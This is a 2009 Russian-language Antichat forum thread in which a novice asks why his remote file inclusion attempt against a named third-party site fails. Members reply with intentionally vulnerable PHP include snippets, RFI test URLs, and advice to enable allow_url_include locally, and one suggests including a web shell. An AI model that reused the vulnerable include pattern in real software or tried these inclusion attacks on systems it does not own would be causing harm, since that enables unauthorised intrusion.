Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

11.11.2009, 00:37
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
B1t.exe, при чем здесь инклуд?
|
|
|

11.11.2009, 00:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от B1t.exe
ммм, ребята, читая ЭТУ статью - так получается...
можете сказать как делать тогда ?
Там вообще показаны примеры инклуда на твоем сервере. Чувствую я, что ты ничего не понимаешь в этом...
|
|
|

11.11.2009, 00:50
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
B1t.exe
сделай на локалке что то подобное
PHP код:
<?php
$page = $_GET['page'];
include($page);
?>
и попробуй заюзать script.php?page=[inj]
|
|
|

11.11.2009, 00:52
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме: 4761503
Репутация:
229
|
|
Сообщение от B1t.exe
ммм, ребята, читая ЭТУ статью - так получается...
можете сказать как делать тогда ?
На локалхосте поэксперементируй с LFI, а что у тя есть исходники страницы 123.ru/...., откуда ты узнал что id именно инклудится?
|
|
|

11.11.2009, 00:53
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
Сообщение от B1t.exe
наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru
на мой сайт залил скрипт:
Код:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149
мой код на сервере под названием ххх.php.
я переделываю ссылку так:
http://www.123.ru/index.php?action= http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id= http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.
Я ошибку делаю, или просто на сайте фильтровывается ?
P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html
Для удаленного инклуда на срвере должен быть включен allow_url_include.
В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный.
P.S.: Почитай лутше вот эту статью:
http://forum.antichat.ru/thread23501.html
В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО.
Последний раз редактировалось Ins3t; 11.11.2009 в 00:59..
|
|
|

11.11.2009, 01:05
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
я не понимаю .. на локалке. т.е. ?
на свем компе ? зачем?
я залил этот скрипт на сервер (интернет) и при запросе
www.mysite.ru/ххх.php
Parse error: syntax error, unexpected '.' in /home/www/mysite.ru/xxx.php on line 2
Я не знаю что там есть, просто в статье написан, что пыполните это на удаленном сервере и если выдаст те ошибки, значит инклюд есть. по этому и я так делал.
|
|
|

11.11.2009, 01:08
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме: 4761503
Репутация:
229
|
|
b1t.exe, иди учи php
|
|
|

11.11.2009, 01:10
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
я не понимаю .. на локалке. т.е. ?
там,где якобы уязвимость.
|
|
|

11.11.2009, 01:11
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
2B1t.exe, омг.
PHP код:
<?
Include ("$page.php");
?>
Точки забыл убрать)
Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
Затем можешь заюзать такой скриптек:
PHP код:
<?
$inc = $_GET['file'];
include ($inc);
?>
И реализовуй:
Код:
localhost/script.php?file=http://google.com
Затем постепенно усложняй:
PHP код:
<?
$inc = $_GET['file'];
if(file_exists($inc))
{
include ($inc);
}
else
{
echo 'ERROR!';
}
?>
И снова реализовуй:
Код:
localhost/script.php?file=ftp://login:pass@host/file.php
И так далее.
Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
https://forum.antichat.ru/thread106780.html
По аналогии и с ЛФИ, нy кароче ты понял)
Последний раз редактировалось Ins3t; 11.11.2009 в 01:17..
|
|
|

11.11.2009, 01:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от Ins3t
нy кароче ты понял)
Сомневаюсь...
B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|